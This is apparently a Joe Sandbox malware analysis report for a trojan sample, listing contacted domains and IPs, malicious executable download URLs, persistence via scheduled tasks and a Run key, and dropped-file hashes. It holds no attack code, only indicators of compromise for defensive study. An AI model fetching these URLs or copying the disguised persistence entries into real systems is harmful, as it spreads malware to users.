                                        		truefalse
                                          		high
                                          goo.su
                                          		172.67.139.105
                                          		truefalse
                                            		high
                                            transfer.sh
                                            		144.76.136.153
                                            		truefalse
                                              		high
                                              api.telegram.org
                                              		149.154.167.220
                                              		truefalse
                                                		high
                                                data-host-coin-8.com
                                                		8.209.70.0
                                                		truefalse
                                                  		high
                                                  api.ip.sb
                                                  		unknown
                                                  		unknownfalse
                                                    		high

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://81.163.30.181/l2.exetrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://185.7.214.171:8080/6.phptrue
                                                    • URL Reputation: malware
                                                    		unknown
                                                    http://host-data-coin-11.com/false
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://data-host-coin-8.com/files/6961_1642089187_2359.exetrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://data-host-coin-8.com/game.exefalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://unicupload.top/install5.exetrue
                                                    • URL Reputation: phishing
                                                    		unknown
                                                    http://74.201.28.62/book/KB5009812.pngtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://privacy-tools-for-you-780.com/downloads/toolspab3.exetrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://74.201.28.62/book/KB5009812.exetrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://data-host-coin-8.com/files/7729_1642101604_1835.exetrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://data-host-coin-8.com/files/9030_1641816409_7037.exetrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://81.163.30.181/l3.exetrue
                                                    • Avira URL Cloud: malware
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://t0.tiles.ditu.live.com/tiles/gen19svchost.exe, 0000000A.00000002.308686012.0000021A33242000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305057096.0000021A33241000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000A.00000002.308686012.0000021A33242000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305057096.0000021A33241000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000A.00000003.283348102.0000021A33231000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000A.00000002.308686012.0000021A33242000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305057096.0000021A33241000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.bingmapsportal.comsvchost.exe, 0000000A.00000002.308487293.0000021A33224000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 0000002F.00000003.406565308.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406653017.00000137971CE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406610529.0000013797198000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://api.ip.sb/ip3BC6.exe, 0000001E.00000002.412827478.0000000003991000.00000004.00000001.sdmp, 3BC6.exe, 0000002D.00000000.408848131.0000000000402000.00000040.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000003.305050188.0000021A33256000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 0000000A.00000003.304930787.0000021A33268000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.308781800.0000021A3326A000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000003.283348102.0000021A33231000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.microsoft.svchost.exe, 00000007.00000002.536270929.000002A7E56AB000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://crl.ver)svchost.exe, 00000007.00000002.554990269.000002A7EAC62000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000002.430423414.00000137968EB000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		low
                                                                                        https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000002F.00000003.407630101.00000137971A4000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.407734160.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.407790447.0000013797602000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.407773416.000001379718D000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.407700908.00000137971A4000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000002.308487293.0000021A33224000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://%s.xboxlive.comsvchost.exe, 00000008.00000002.534681859.0000015FD863E000.00000004.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		low
                                                                                            https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000002.308706855.0000021A3324D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305040244.0000021A33246000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000003.283348102.0000021A33231000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.disneyplus.com/legal/privacy-policysvchost.exe, 0000002F.00000003.406565308.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406653017.00000137971CE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406610529.0000013797198000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://dynamic.tsvchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://disneyplus.com/legal.svchost.exe, 0000002F.00000003.406565308.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406653017.00000137971CE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406610529.0000013797198000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000A.00000003.283348102.0000021A33231000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.308656175.0000021A3323A000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://activity.windows.comsvchost.exe, 00000008.00000002.534681859.0000015FD863E000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://help.disneyplus.com.svchost.exe, 0000002F.00000003.406565308.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406653017.00000137971CE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406610529.0000013797198000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://%s.dnet.xboxlive.comsvchost.exe, 00000008.00000002.534681859.0000015FD863E000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		low
                                                                                                                  https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpfalse
                                                                                                                      		high

                                                                                                                      Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      40.93.207.0
                                                                                                                      		microsoft-com.mail.protection.outlook.comUnited States
                                                                                                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                      94.142.143.116
                                                                                                                      		patmushta.infoRussian Federation
                                                                                                                      		35196IHOR-ASRUfalse
                                                                                                                      188.166.28.199
                                                                                                                      		unknownNetherlands
                                                                                                                      		14061DIGITALOCEAN-ASNUStrue
                                                                                                                      172.67.139.105
                                                                                                                      		goo.suUnited States
                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                      74.201.28.62
                                                                                                                      		unknownUnited States
                                                                                                                      		35913DEDIPATH-LLCUStrue
                                                                                                                      8.209.70.0
                                                                                                                      		host-data-coin-11.comSingapore
                                                                                                                      		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                      54.38.220.85
                                                                                                                      		unicupload.topFrance
                                                                                                                      		16276OVHFRfalse
                                                                                                                      162.159.133.233
                                                                                                                      		cdn.discordapp.comUnited States
                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                      144.76.136.153
                                                                                                                      		transfer.shGermany
                                                                                                                      		24940HETZNER-ASDEfalse
                                                                                                                      81.163.30.181
                                                                                                                      		unknownRussian Federation
                                                                                                                      		58303IR-RASANAPISHTAZIRfalse
                                                                                                                      185.233.81.115
                                                                                                                      		unknownRussian Federation
                                                                                                                      		50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                      185.7.214.171
                                                                                                                      		unknownFrance
                                                                                                                      		42652DELUNETDEtrue
                                                                                                                      185.186.142.166
                                                                                                                      		unknownRussian Federation
                                                                                                                      		204490ASKONTELRUtrue

                                                                                                                      Private

                                                                                                                      IP
                                                                                                                      192.168.2.1
                                                                                                                      127.0.0.1

                                                                                                                      General Information

                                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                      Analysis ID:553412
                                                                                                                      Start date:14.01.2022
                                                                                                                      Start time:21:03:19
                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                      Overall analysis duration:0h 15m 35s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:light
                                                                                                                      Sample file name:OG9rNsihJ7.exe
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                      Number of analysed new started processes analysed:48
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:1
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • HDC enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.evad.winEXE@60/37@100/15
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      HDC Information:
                                                                                                                      • Successful, ratio: 23.5% (good quality ratio 16.1%)
                                                                                                                      • Quality average: 52.1%
                                                                                                                      • Quality standard deviation: 40.6%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 58%
                                                                                                                      • Number of executed functions: 0
                                                                                                                      • Number of non-executed functions: 0
                                                                                                                      Cookbook Comments:
                                                                                                                      • Adjust boot time
                                                                                                                      • Enable AMSI
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      Warnings:
                                                                                                                      Show All
                                                                                                                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                      • TCP Packets have been reduced to 100
                                                                                                                      • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 23.35.236.56, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 104.208.16.94, 20.54.110.249, 20.42.73.29, 104.26.13.31, 104.26.12.31, 172.67.75.172
                                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, iplogger.org, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, microsoft.com, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • VT rate limit hit for: OG9rNsihJ7.exe

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      21:04:25API Interceptor10x Sleep call for process: svchost.exe modified
                                                                                                                      21:04:56Task SchedulerRun new task: Firefox Default Browser Agent B300E2CA9C9656AE path: C:\Users\user\AppData\Roaming\vfgiwcs
                                                                                                                      21:05:11API Interceptor1x Sleep call for process: 254E.exe modified
                                                                                                                      21:05:29API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                      21:05:55API Interceptor1x Sleep call for process: explorer.exe modified
                                                                                                                      21:06:32AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RegHost C:\Users\user\AppData\Roaming\Microsoft\RegHost.exe
                                                                                                                      21:06:34Task SchedulerRun new task: Telemetry Logging path: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                                                                                                                      21:06:52Task SchedulerRun new task: services path: C:\Users\user\AppData\Roaming\Microsoft\services.exe

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      No context

                                                                                                                      Domains

                                                                                                                      No context

                                                                                                                      ASN

                                                                                                                      No context

                                                                                                                      JA3 Fingerprints

                                                                                                                      No context

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:MPEG-4 LOAS
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1310720
                                                                                                                      Entropy (8bit):0.24860094463598098
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4P:BJiRdwfu2SRU4P
                                                                                                                      MD5:C9689D25BCB7A6122C80D8D1248CD525
                                                                                                                      SHA1:3626F8C656E1F3524CD70D2C237FBDC25AF8C26B
                                                                                                                      SHA-256:A1B6750BEA5C766B4AC8A6D65695475180388153C3504BBBA66053A8BB3F9014
                                                                                                                      SHA-512:1B132DCA5A85A0B510A84117A7F8CEEB2AD4591C24EFA651D6E39B2D94140F4D37E30DFBDC4A860D661E54188703ABD742AA3153ED9B6EEECEB0E16FA093D14F
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x962e81fb, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):786432
                                                                                                                      Entropy (8bit):0.2506309986392212
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:M+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:TSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                      MD5:AEF5940564973C51F03B64B3BF5DAF42
                                                                                                                      SHA1:B5A630CEDB208FCF5DE3E8C4EE6C1ECE9AC50644
                                                                                                                      SHA-256:03AD212E8D9030DB0C6C1AE6B3C3560681FB1C5DC012CC75FECC751E81C39F6A
                                                                                                                      SHA-512:B91EB9A7ACB63185D5304A2AEF6CEB973AD4F7C031BDB6BB51CECAF7A44AE1B44CC83DD2A9EA92051188AE0FA67FEF65D3B5C15F162EAFB5C400D0E6720FF44F
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: ....... ................e.f.3...w........................&..........w.......z..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................k..t.....z...................iQ......z..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):16384
                                                                                                                      Entropy (8bit):0.07533799262335537
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:rftl7Ev/2ff4lkl/bJdAtiX0/gqkf4l1all3Vkttlmlnl:DXinkt4ztQ3
                                                                                                                      MD5:2107023193542ECC0970CB79A0C9E236
                                                                                                                      SHA1:F5D4FD1244E423620174644F19B9F4C484DCA0A5
                                                                                                                      SHA-256:9B5F9895367FCB9497C1DA993C21C355AA6937BF3FD1FD719E08EAAF905BCDD4
                                                                                                                      SHA-512:1DA7C4DB4F8D644D2EADBE475EC111B408697B2E974C5943C9A1AD4230C0C57451AC5B0CCEC2F97C1E4C93D15CC2C2D291ECA6BDC40AD7574CBFC75959A3D929
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: .1'......................................3...w.......z.......w...............w.......w....:O.....w...................iQ......z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_B1B2.exe_97263ecc359653bdc088fc4542e7f7e1a086af1b_57588827_1b13b61d\Report.wer
                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):65536
                                                                                                                      Entropy (8bit):0.8138460270665933
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:zvFmoP1pgLnCDyaC9OQoJ7R3V6tpXIQcQec6tycEfcw3qhz+HbHg/8BRTf3o8Fa7:zvP1pKC+q8HQ0lLjIq/u7sZS274Itvu
                                                                                                                      MD5:A718EF39D4118C87DFC94920D817BDB7
                                                                                                                      SHA1:1C873AFB51135338D4F94B5A7F259BC0D7874793
                                                                                                                      SHA-256:D295541AB8373183E475D1A7780D51C4C8AFEA49D4ECEA63F440B98656873954
                                                                                                                      SHA-512:3AD8085642AB1655D958F37C3E0E0DCA86911047587D74A31B8A5E152AA3854BD8E41CC9074F4481444F0B170DD69CF1B184E7D0F26D414EA87F3CF9EC50AE8F
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.9.6.7.1.1.6.5.9.9.5.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.9.6.7.2.8.0.1.9.3.7.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.2.5.7.b.a.b.9.-.4.c.8.a.-.4.4.1.d.-.8.5.3.c.-.8.7.b.3.5.1.1.7.8.c.0.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.c.c.4.2.1.3.-.8.3.c.d.-.4.4.a.a.-.b.4.9.1.-.5.a.a.9.6.6.d.8.2.f.4.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.1.B.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.0.c.-.0.0.0.1.-.0.0.1.6.-.6.6.7.3.-.e.6.7.2.c.d.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.4.3.2.a.e.1.c.8.6.8.c.9.6.1.2.8.e.c.a.0.4.a.e.4.c.5.4.4.7.e.6.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.B.1.B.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1914.tmp.csv
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):49372
                                                                                                                      Entropy (8bit):3.067630685633625
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:SrHbYM8XsdtCvsOVnMZFRInPK/AyqP0b5Nt6:SrHbYM8XsdtCvsOVnMZFRIPK/AyqP0bg
                                                                                                                      MD5:338F750C272EF10F787C1E43F7469E7C
                                                                                                                      SHA1:6BAD6258FA53FAC05D2F096E899F246786E4A3F0
                                                                                                                      SHA-256:4A99A6B112F2BC0F1B2EE04E5A0E555EBCC6685B1F3735577DBD42D6FBE86085
                                                                                                                      SHA-512:E7D72CBE85F51D6D393F3EDCFD3518CCD7C5254A6DA052111D957B0644BBB75AB5FF978E9A7B9300D71FEDE41D288BB64931E8F906F5836464558E6978124598
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
